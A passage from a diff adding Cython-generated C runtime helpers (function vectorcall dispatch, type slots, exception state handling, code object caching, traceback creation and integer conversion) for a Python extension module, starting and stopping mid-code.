*cyfunc = (__pyx_CyFunctionObject *) func; +#if CYTHON_METH_FASTCALL + __pyx_vectorcallfunc vc = __Pyx_CyFunction_func_vectorcall(cyfunc); + if (vc) { +#if CYTHON_ASSUME_SAFE_MACROS + return __Pyx_PyVectorcall_FastCallDict(func, vc, &PyTuple_GET_ITEM(args, 0), (size_t)PyTuple_GET_SIZE(args), kw); +#else + (void) &__Pyx_PyVectorcall_FastCallDict; + return PyVectorcall_Call(func, args, kw); +#endif + } +#endif + if ((cyfunc->flags & __Pyx_CYFUNCTION_CCLASS) && !(cyfunc->flags & __Pyx_CYFUNCTION_STATICMETHOD)) { + Py_ssize_t argc; + PyObject *new_args; + PyObject *self; + argc = PyTuple_GET_SIZE(args); + new_args = PyTuple_GetSlice(args, 1, argc); + if (unlikely(!new_args)) + return NULL; + self = PyTuple_GetItem(args, 0); + if (unlikely(!self)) { + Py_DECREF(new_args); +#if PY_MAJOR_VERSION > 2 + PyErr_Format(PyExc_TypeError, + "unbound method %.200S() needs an argument", + cyfunc->func_qualname); +#else + PyErr_SetString(PyExc_TypeError, + "unbound method needs an argument"); +#endif + return NULL; + } + result = __Pyx_CyFunction_CallMethod(func, self, new_args, kw); + Py_DECREF(new_args); + } else { + result = __Pyx_CyFunction_Call(func, args, kw); + } + return result; +} +#if CYTHON_METH_FASTCALL +static CYTHON_INLINE int __Pyx_CyFunction_Vectorcall_CheckArgs(__pyx_CyFunctionObject *cyfunc, Py_ssize_t nargs, PyObject *kwnames) +{ + int ret = 0; + if ((cyfunc->flags & __Pyx_CYFUNCTION_CCLASS) && !(cyfunc->flags & __Pyx_CYFUNCTION_STATICMETHOD)) { + if (unlikely(nargs < 1)) { + PyErr_Format(PyExc_TypeError, "%.200s() needs an argument", + ((PyCFunctionObject*)cyfunc)->m_ml->ml_name); + return -1; + } + ret = 1; + } + if (unlikely(kwnames) && unlikely(PyTuple_GET_SIZE(kwnames))) { + PyErr_Format(PyExc_TypeError, + "%.200s() takes no keyword arguments", ((PyCFunctionObject*)cyfunc)->m_ml->ml_name); + return -1; + } + return ret; +} +static PyObject * __Pyx_CyFunction_Vectorcall_NOARGS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, kwnames)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + if (unlikely(nargs != 0)) { + PyErr_Format(PyExc_TypeError, + "%.200s() takes no arguments (%" CYTHON_FORMAT_SSIZE_T "d given)", + def->ml_name, nargs); + return NULL; + } + return def->ml_meth(self, NULL); +} +static PyObject * __Pyx_CyFunction_Vectorcall_O(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, kwnames)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + if (unlikely(nargs != 1)) { + PyErr_Format(PyExc_TypeError, + "%.200s() takes exactly one argument (%" CYTHON_FORMAT_SSIZE_T "d given)", + def->ml_name, nargs); + return NULL; + } + return def->ml_meth(self, args[0]); +} +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, NULL)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + return ((_PyCFunctionFastWithKeywords)(void(*)(void))def->ml_meth)(self, args, nargs, kwnames); +} +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS_METHOD(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; + PyTypeObject *cls = (PyTypeObject *) __Pyx_CyFunction_GetClassObj(cyfunc); +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, NULL)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + return ((__Pyx_PyCMethod)(void(*)(void))def->ml_meth)(self, cls, args, (size_t)nargs, kwnames); +} +#endif +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __pyx_CyFunctionType_slots[] = { + {Py_tp_dealloc, (void *)__Pyx_CyFunction_dealloc}, + {Py_tp_repr, (void *)__Pyx_CyFunction_repr}, + {Py_tp_call, (void *)__Pyx_CyFunction_CallAsMethod}, + {Py_tp_traverse, (void *)__Pyx_CyFunction_traverse}, + {Py_tp_clear, (void *)__Pyx_CyFunction_clear}, + {Py_tp_methods, (void *)__pyx_CyFunction_methods}, + {Py_tp_members, (void *)__pyx_CyFunction_members}, + {Py_tp_getset, (void *)__pyx_CyFunction_getsets}, + {Py_tp_descr_get, (void *)__Pyx_PyMethod_New}, + {0, 0}, +}; +static PyType_Spec __pyx_CyFunctionType_spec = { + __PYX_TYPE_MODULE_PREFIX "cython_function_or_method", + sizeof(__pyx_CyFunctionObject), + 0, +#ifdef Py_TPFLAGS_METHOD_DESCRIPTOR + Py_TPFLAGS_METHOD_DESCRIPTOR | +#endif +#if (defined(_Py_TPFLAGS_HAVE_VECTORCALL) && CYTHON_METH_FASTCALL) + _Py_TPFLAGS_HAVE_VECTORCALL | +#endif + Py_TPFLAGS_DEFAULT | Py_TPFLAGS_HAVE_GC | Py_TPFLAGS_BASETYPE, + __pyx_CyFunctionType_slots +}; +#else +static PyTypeObject __pyx_CyFunctionType_type = { + PyVarObject_HEAD_INIT(0, 0) + __PYX_TYPE_MODULE_PREFIX "cython_function_or_method", + sizeof(__pyx_CyFunctionObject), + 0, + (destructor) __Pyx_CyFunction_dealloc, +#if !CYTHON_METH_FASTCALL + 0, +#elif CYTHON_BACKPORT_VECTORCALL + (printfunc)offsetof(__pyx_CyFunctionObject, func_vectorcall), +#else + offsetof(PyCFunctionObject, vectorcall), +#endif + 0, + 0, +#if PY_MAJOR_VERSION < 3 + 0, +#else + 0, +#endif + (reprfunc) __Pyx_CyFunction_repr, + 0, + 0, + 0, + 0, + __Pyx_CyFunction_CallAsMethod, + 0, + 0, + 0, + 0, +#ifdef Py_TPFLAGS_METHOD_DESCRIPTOR + Py_TPFLAGS_METHOD_DESCRIPTOR | +#endif +#ifdef _Py_TPFLAGS_HAVE_VECTORCALL + _Py_TPFLAGS_HAVE_VECTORCALL | +#endif + Py_TPFLAGS_DEFAULT | Py_TPFLAGS_HAVE_GC | Py_TPFLAGS_BASETYPE, + 0, + (traverseproc) __Pyx_CyFunction_traverse, + (inquiry) __Pyx_CyFunction_clear, + 0, +#if PY_VERSION_HEX < 0x030500A0 + offsetof(__pyx_CyFunctionObject, func_weakreflist), +#else + offsetof(PyCFunctionObject, m_weakreflist), +#endif + 0, + 0, + __pyx_CyFunction_methods, + __pyx_CyFunction_members, + __pyx_CyFunction_getsets, + 0, + 0, + __Pyx_PyMethod_New, + 0, + offsetof(__pyx_CyFunctionObject, func_dict), + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, +#if PY_VERSION_HEX >= 0x030400a1 + 0, +#endif +#if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, +#endif +#if __PYX_NEED_TP_PRINT_SLOT + 0, +#endif +#if PY_VERSION_HEX >= 0x030C0000 + 0, +#endif +#if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, +#endif +}; +#endif +static int __pyx_CyFunction_init(PyObject *module) { +#if CYTHON_USE_TYPE_SPECS + __pyx_CyFunctionType = __Pyx_FetchCommonTypeFromSpec(module, &__pyx_CyFunctionType_spec, NULL); +#else + CYTHON_UNUSED_VAR(module); + __pyx_CyFunctionType = __Pyx_FetchCommonType(&__pyx_CyFunctionType_type); +#endif + if (unlikely(__pyx_CyFunctionType == NULL)) { + return -1; + } + return 0; +} +static CYTHON_INLINE void *__Pyx_CyFunction_InitDefaults(PyObject *func, size_t size, int pyobjects) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->defaults = PyObject_Malloc(size); + if (unlikely(!m->defaults)) + return PyErr_NoMemory(); + memset(m->defaults, 0, size); + m->defaults_pyobjects = pyobjects; + m->defaults_size = size; + return m->defaults; +} +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsTuple(PyObject *func, PyObject *tuple) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->defaults_tuple = tuple; + Py_INCREF(tuple); +} +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsKwDict(PyObject *func, PyObject *dict) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->defaults_kwdict = dict; + Py_INCREF(dict); +} +static CYTHON_INLINE void __Pyx_CyFunction_SetAnnotationsDict(PyObject *func, PyObject *dict) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->func_annotations = dict; + Py_INCREF(dict); +} + +/* CythonFunction */ +static PyObject *__Pyx_CyFunction_New(PyMethodDef *ml, int flags, PyObject* qualname, + PyObject *closure, PyObject *module, PyObject* globals, PyObject* code) { + PyObject *op = __Pyx_CyFunction_Init( + PyObject_GC_New(__pyx_CyFunctionObject, __pyx_CyFunctionType), + ml, flags, qualname, closure, module, globals, code + ); + if (likely(op)) { + PyObject_GC_Track(op); + } + return op; +} + +/* PyDictVersioning */ +#if CYTHON_USE_DICT_VERSIONS && CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PY_UINT64_T __Pyx_get_tp_dict_version(PyObject *obj) { + PyObject *dict = Py_TYPE(obj)->tp_dict; + return likely(dict) ? __PYX_GET_DICT_VERSION(dict) : 0; +} +static CYTHON_INLINE PY_UINT64_T __Pyx_get_object_dict_version(PyObject *obj) { + PyObject **dictptr = NULL; + Py_ssize_t offset = Py_TYPE(obj)->tp_dictoffset; + if (offset) { +#if CYTHON_COMPILING_IN_CPYTHON + dictptr = (likely(offset > 0)) ? (PyObject **) ((char *)obj + offset) : _PyObject_GetDictPtr(obj); +#else + dictptr = _PyObject_GetDictPtr(obj); +#endif + } + return (dictptr && *dictptr) ? __PYX_GET_DICT_VERSION(*dictptr) : 0; +} +static CYTHON_INLINE int __Pyx_object_dict_version_matches(PyObject* obj, PY_UINT64_T tp_dict_version, PY_UINT64_T obj_dict_version) { + PyObject *dict = Py_TYPE(obj)->tp_dict; + if (unlikely(!dict) || unlikely(tp_dict_version != __PYX_GET_DICT_VERSION(dict))) + return 0; + return obj_dict_version == __Pyx_get_object_dict_version(obj); +} +#endif + +/* PyErrExceptionMatches */ +#if CYTHON_FAST_THREAD_STATE +static int __Pyx_PyErr_ExceptionMatchesTuple(PyObject *exc_type, PyObject *tuple) { + Py_ssize_t i, n; + n = PyTuple_GET_SIZE(tuple); +#if PY_MAJOR_VERSION >= 3 + for (i=0; i= 0x030C00A6 + PyObject *current_exception = tstate->current_exception; + if (unlikely(!current_exception)) return 0; + exc_type = (PyObject*) Py_TYPE(current_exception); + if (exc_type == err) return 1; +#else + exc_type = tstate->curexc_type; + if (exc_type == err) return 1; + if (unlikely(!exc_type)) return 0; +#endif + #if CYTHON_AVOID_BORROWED_REFS + Py_INCREF(exc_type); + #endif + if (unlikely(PyTuple_Check(err))) { + result = __Pyx_PyErr_ExceptionMatchesTuple(exc_type, err); + } else { + result = __Pyx_PyErr_GivenExceptionMatches(exc_type, err); + } + #if CYTHON_AVOID_BORROWED_REFS + Py_DECREF(exc_type); + #endif + return result; +} +#endif + +/* PyErrFetchRestore */ +#if CYTHON_FAST_THREAD_STATE +static CYTHON_INLINE void __Pyx_ErrRestoreInState(PyThreadState *tstate, PyObject *type, PyObject *value, PyObject *tb) { +#if PY_VERSION_HEX >= 0x030C00A6 + PyObject *tmp_value; + assert(type == NULL || (value != NULL && type == (PyObject*) Py_TYPE(value))); + if (value) { + #if CYTHON_COMPILING_IN_CPYTHON + if (unlikely(((PyBaseExceptionObject*) value)->traceback != tb)) + #endif + PyException_SetTraceback(value, tb); + } + tmp_value = tstate->current_exception; + tstate->current_exception = value; + Py_XDECREF(tmp_value); +#else + PyObject *tmp_type, *tmp_value, *tmp_tb; + tmp_type = tstate->curexc_type; + tmp_value = tstate->curexc_value; + tmp_tb = tstate->curexc_traceback; + tstate->curexc_type = type; + tstate->curexc_value = value; + tstate->curexc_traceback = tb; + Py_XDECREF(tmp_type); + Py_XDECREF(tmp_value); + Py_XDECREF(tmp_tb); +#endif +} +static CYTHON_INLINE void __Pyx_ErrFetchInState(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb) { +#if PY_VERSION_HEX >= 0x030C00A6 + PyObject* exc_value; + exc_value = tstate->current_exception; + tstate->current_exception = 0; + *value = exc_value; + *type = NULL; + *tb = NULL; + if (exc_value) { + *type = (PyObject*) Py_TYPE(exc_value); + Py_INCREF(*type); + #if CYTHON_COMPILING_IN_CPYTHON + *tb = ((PyBaseExceptionObject*) exc_value)->traceback; + Py_XINCREF(*tb); + #else + *tb = PyException_GetTraceback(exc_value); + #endif + } +#else + *type = tstate->curexc_type; + *value = tstate->curexc_value; + *tb = tstate->curexc_traceback; + tstate->curexc_type = 0; + tstate->curexc_value = 0; + tstate->curexc_traceback = 0; +#endif +} +#endif + +/* PyObjectGetAttrStrNoError */ +static void __Pyx_PyObject_GetAttrStr_ClearAttributeError(void) { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + if (likely(__Pyx_PyErr_ExceptionMatches(PyExc_AttributeError))) + __Pyx_PyErr_Clear(); +} +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStrNoError(PyObject* obj, PyObject* attr_name) { + PyObject *result; +#if CYTHON_COMPILING_IN_CPYTHON && CYTHON_USE_TYPE_SLOTS && PY_VERSION_HEX >= 0x030700B1 + PyTypeObject* tp = Py_TYPE(obj); + if (likely(tp->tp_getattro == PyObject_GenericGetAttr)) { + return _PyObject_GenericGetAttrWithDict(obj, attr_name, NULL, 1); + } +#endif + result = __Pyx_PyObject_GetAttrStr(obj, attr_name); + if (unlikely(!result)) { + __Pyx_PyObject_GetAttrStr_ClearAttributeError(); + } + return result; +} + +/* CLineInTraceback */ +#ifndef CYTHON_CLINE_IN_TRACEBACK +static int __Pyx_CLineForTraceback(PyThreadState *tstate, int c_line) { + PyObject *use_cline; + PyObject *ptype, *pvalue, *ptraceback; +#if CYTHON_COMPILING_IN_CPYTHON + PyObject **cython_runtime_dict; +#endif + CYTHON_MAYBE_UNUSED_VAR(tstate); + if (unlikely(!__pyx_cython_runtime)) { + return c_line; + } + __Pyx_ErrFetchInState(tstate, &ptype, &pvalue, &ptraceback); +#if CYTHON_COMPILING_IN_CPYTHON + cython_runtime_dict = _PyObject_GetDictPtr(__pyx_cython_runtime); + if (likely(cython_runtime_dict)) { + __PYX_PY_DICT_LOOKUP_IF_MODIFIED( + use_cline, *cython_runtime_dict, + __Pyx_PyDict_GetItemStr(*cython_runtime_dict, __pyx_n_s_cline_in_traceback)) + } else +#endif + { + PyObject *use_cline_obj = __Pyx_PyObject_GetAttrStrNoError(__pyx_cython_runtime, __pyx_n_s_cline_in_traceback); + if (use_cline_obj) { + use_cline = PyObject_Not(use_cline_obj) ? Py_False : Py_True; + Py_DECREF(use_cline_obj); + } else { + PyErr_Clear(); + use_cline = NULL; + } + } + if (!use_cline) { + c_line = 0; + (void) PyObject_SetAttr(__pyx_cython_runtime, __pyx_n_s_cline_in_traceback, Py_False); + } + else if (use_cline == Py_False || (use_cline != Py_True && PyObject_Not(use_cline) != 0)) { + c_line = 0; + } + __Pyx_ErrRestoreInState(tstate, ptype, pvalue, ptraceback); + return c_line; +} +#endif + +/* CodeObjectCache */ +#if !CYTHON_COMPILING_IN_LIMITED_API +static int __pyx_bisect_code_objects(__Pyx_CodeObjectCacheEntry* entries, int count, int code_line) { + int start = 0, mid = 0, end = count - 1; + if (end >= 0 && code_line > entries[end].code_line) { + return count; + } + while (start < end) { + mid = start + (end - start) / 2; + if (code_line < entries[mid].code_line) { + end = mid; + } else if (code_line > entries[mid].code_line) { + start = mid + 1; + } else { + return mid; + } + } + if (code_line <= entries[mid].code_line) { + return mid; + } else { + return mid + 1; + } +} +static PyCodeObject *__pyx_find_code_object(int code_line) { + PyCodeObject* code_object; + int pos; + if (unlikely(!code_line) || unlikely(!__pyx_code_cache.entries)) { + return NULL; + } + pos = __pyx_bisect_code_objects(__pyx_code_cache.entries, __pyx_code_cache.count, code_line); + if (unlikely(pos >= __pyx_code_cache.count) || unlikely(__pyx_code_cache.entries[pos].code_line != code_line)) { + return NULL; + } + code_object = __pyx_code_cache.entries[pos].code_object; + Py_INCREF(code_object); + return code_object; +} +static void __pyx_insert_code_object(int code_line, PyCodeObject* code_object) { + int pos, i; + __Pyx_CodeObjectCacheEntry* entries = __pyx_code_cache.entries; + if (unlikely(!code_line)) { + return; + } + if (unlikely(!entries)) { + entries = (__Pyx_CodeObjectCacheEntry*)PyMem_Malloc(64*sizeof(__Pyx_CodeObjectCacheEntry)); + if (likely(entries)) { + __pyx_code_cache.entries = entries; + __pyx_code_cache.max_count = 64; + __pyx_code_cache.count = 1; + entries[0].code_line = code_line; + entries[0].code_object = code_object; + Py_INCREF(code_object); + } + return; + } + pos = __pyx_bisect_code_objects(__pyx_code_cache.entries, __pyx_code_cache.count, code_line); + if ((pos < __pyx_code_cache.count) && unlikely(__pyx_code_cache.entries[pos].code_line == code_line)) { + PyCodeObject* tmp = entries[pos].code_object; + entries[pos].code_object = code_object; + Py_DECREF(tmp); + return; + } + if (__pyx_code_cache.count == __pyx_code_cache.max_count) { + int new_max = __pyx_code_cache.max_count + 64; + entries = (__Pyx_CodeObjectCacheEntry*)PyMem_Realloc( + __pyx_code_cache.entries, ((size_t)new_max) * sizeof(__Pyx_CodeObjectCacheEntry)); + if (unlikely(!entries)) { + return; + } + __pyx_code_cache.entries = entries; + __pyx_code_cache.max_count = new_max; + } + for (i=__pyx_code_cache.count; i>pos; i--) { + entries[i] = entries[i-1]; + } + entries[pos].code_line = code_line; + entries[pos].code_object = code_object; + __pyx_code_cache.count++; + Py_INCREF(code_object); +} +#endif + +/* AddTraceback */ +#include "compile.h" +#include "frameobject.h" +#include "traceback.h" +#if PY_VERSION_HEX >= 0x030b00a6 + #ifndef Py_BUILD_CORE + #define Py_BUILD_CORE 1 + #endif + #include "internal/pycore_frame.h" +#endif +#if CYTHON_COMPILING_IN_LIMITED_API +static void __Pyx_AddTraceback(const char *funcname, int c_line, + int py_line, const char *filename) { + if (c_line) { + (void) __pyx_cfilenm; + (void) __Pyx_CLineForTraceback(__Pyx_PyThreadState_Current, c_line); + } + _PyTraceback_Add(funcname, filename, py_line); +} +#else +static PyCodeObject* __Pyx_CreateCodeObjectForTraceback( + const char *funcname, int c_line, + int py_line, const char *filename) { + PyCodeObject *py_code = NULL; + PyObject *py_funcname = NULL; + #if PY_MAJOR_VERSION < 3 + PyObject *py_srcfile = NULL; + py_srcfile = PyString_FromString(filename); + if (!py_srcfile) goto bad; + #endif + if (c_line) { + #if PY_MAJOR_VERSION < 3 + py_funcname = PyString_FromFormat( "%s (%s:%d)", funcname, __pyx_cfilenm, c_line); + if (!py_funcname) goto bad; + #else + py_funcname = PyUnicode_FromFormat( "%s (%s:%d)", funcname, __pyx_cfilenm, c_line); + if (!py_funcname) goto bad; + funcname = PyUnicode_AsUTF8(py_funcname); + if (!funcname) goto bad; + #endif + } + else { + #if PY_MAJOR_VERSION < 3 + py_funcname = PyString_FromString(funcname); + if (!py_funcname) goto bad; + #endif + } + #if PY_MAJOR_VERSION < 3 + py_code = __Pyx_PyCode_New( + 0, + 0, + 0, + 0, + 0, + 0, + __pyx_empty_bytes, /*PyObject *code,*/ + __pyx_empty_tuple, /*PyObject *consts,*/ + __pyx_empty_tuple, /*PyObject *names,*/ + __pyx_empty_tuple, /*PyObject *varnames,*/ + __pyx_empty_tuple, /*PyObject *freevars,*/ + __pyx_empty_tuple, /*PyObject *cellvars,*/ + py_srcfile, /*PyObject *filename,*/ + py_funcname, /*PyObject *name,*/ + py_line, + __pyx_empty_bytes /*PyObject *lnotab*/ + ); + Py_DECREF(py_srcfile); + #else + py_code = PyCode_NewEmpty(filename, funcname, py_line); + #endif + Py_XDECREF(py_funcname); // XDECREF since it's only set on Py3 if cline + return py_code; +bad: + Py_XDECREF(py_funcname); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(py_srcfile); + #endif + return NULL; +} +static void __Pyx_AddTraceback(const char *funcname, int c_line, + int py_line, const char *filename) { + PyCodeObject *py_code = 0; + PyFrameObject *py_frame = 0; + PyThreadState *tstate = __Pyx_PyThreadState_Current; + PyObject *ptype, *pvalue, *ptraceback; + if (c_line) { + c_line = __Pyx_CLineForTraceback(tstate, c_line); + } + py_code = __pyx_find_code_object(c_line ? -c_line : py_line); + if (!py_code) { + __Pyx_ErrFetchInState(tstate, &ptype, &pvalue, &ptraceback); + py_code = __Pyx_CreateCodeObjectForTraceback( + funcname, c_line, py_line, filename); + if (!py_code) { + /* If the code object creation fails, then we should clear the + fetched exception references and propagate the new exception */ + Py_XDECREF(ptype); + Py_XDECREF(pvalue); + Py_XDECREF(ptraceback); + goto bad; + } + __Pyx_ErrRestoreInState(tstate, ptype, pvalue, ptraceback); + __pyx_insert_code_object(c_line ? -c_line : py_line, py_code); + } + py_frame = PyFrame_New( + tstate, /*PyThreadState *tstate,*/ + py_code, /*PyCodeObject *code,*/ + __pyx_d, /*PyObject *globals,*/ + 0 /*PyObject *locals*/ + ); + if (!py_frame) goto bad; + __Pyx_PyFrame_SetLineNumber(py_frame, py_line); + PyTraceBack_Here(py_frame); +bad: + Py_XDECREF(py_code); + Py_XDECREF(py_frame); +} +#endif + +/* CIntFromPyVerify */ +#define __PYX_VERIFY_RETURN_INT(target_type, func_type, func_value)\ + __PYX__VERIFY_RETURN_INT(target_type, func_type, func_value, 0) +#define __PYX_VERIFY_RETURN_INT_EXC(target_type, func_type, func_value)\ + __PYX__VERIFY_RETURN_INT(target_type, func_type, func_value, 1) +#define __PYX__VERIFY_RETURN_INT(target_type, func_type, func_value, exc)\ + {\ + func_type value = func_value;\ + if (sizeof(target_type) < sizeof(func_type)) {\ + if (unlikely(value != (func_type) (target_type) value)) {\ + func_type zero = 0;\ + if (exc && unlikely(value == (func_type)-1 && PyErr_Occurred()))\ + return (target_type) -1;\ + if (is_unsigned && unlikely(value < zero))\ + goto raise_neg_overflow;\ + else\ + goto raise_overflow;\ + }\ + }\ + return (target_type) value;\ + } + +/* CIntToPy */ +static CYTHON_INLINE PyObject* __Pyx_PyInt_From_long(long value) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const long neg_one = (long) -1, const_zero = (long) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; + if (is_unsigned) { + if (sizeof(long) < sizeof(long)) { + return PyInt_FromLong((long) value); + } else if (sizeof(long) <= sizeof(unsigned long)) { + return PyLong_FromUnsignedLong((unsigned long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(long) <= sizeof(unsigned PY_LONG_LONG)) { + return PyLong_FromUnsignedLongLong((unsigned PY_LONG_LONG) value); +#endif + } + } else { + if (sizeof(long) <= sizeof(long)) { + return PyInt_FromLong((long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(long) <= sizeof(PY_LONG_LONG)) { + return PyLong_FromLongLong((PY_LONG_LONG) value); +#endif + } + } + { + int one = 1; int little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&value; + return _PyLong_FromByteArray(bytes, sizeof(long), + little, !is_unsigned); + } +} + +/* CIntFromPy */ +static CYTHON_INLINE long __Pyx_PyInt_As_long(PyObject *x) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const long neg_one = (long) -1, const_zero = (long) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x))) { + if ((sizeof(long) < sizeof(long))) { + __PYX_VERIFY_RETURN_INT(long, long, PyInt_AS_LONG(x)) + } else { + long val = PyInt_AS_LONG(x); + if (is_unsigned && unlikely(val < 0)) { + goto raise_neg_overflow; + } + return (long) val; + } + } else +#endif + if (likely(PyLong_Check(x))) { + if (is_unsigned) { +#if CYTHON_USE_PYLONG_INTERNALS + if (unlikely(__Pyx_PyLong_IsNeg(x))) { + goto raise_neg_overflow; + } else if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(long, __Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_DigitCount(x)) { + case 2: + if ((8 * sizeof(long) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) >= 2 * PyLong_SHIFT)) { + return (long) (((((long)digits[1]) << PyLong_SHIFT) | (long)digits[0])); + } + } + break; + case 3: + if ((8 * sizeof(long) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) >= 3 * PyLong_SHIFT)) { + return (long) (((((((long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0])); + } + } + break; + case 4: + if ((8 * sizeof(long) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) >= 4 * PyLong_SHIFT)) { + return (long) (((((((((long)digits[3]) << PyLong_SHIFT) | (long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0])); + } + } + break; + } + } +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 + if (unlikely(Py_SIZE(x) < 0)) { + goto raise_neg_overflow; + } +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (long) -1; + if (unlikely(result == 1)) + goto raise_neg_overflow; + } +#endif + if ((sizeof(long) <= sizeof(unsigned long))) { + __PYX_VERIFY_RETURN_INT_EXC(long, unsigned long, PyLong_AsUnsignedLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(long) <= sizeof(unsigned PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(long, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) +#endif + } + } else { +#if CYTHON_USE_PYLONG_INTERNALS + if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(long, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_SignedDigitCount(x)) { + case -2: + if ((8 * sizeof(long) - 1 > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + 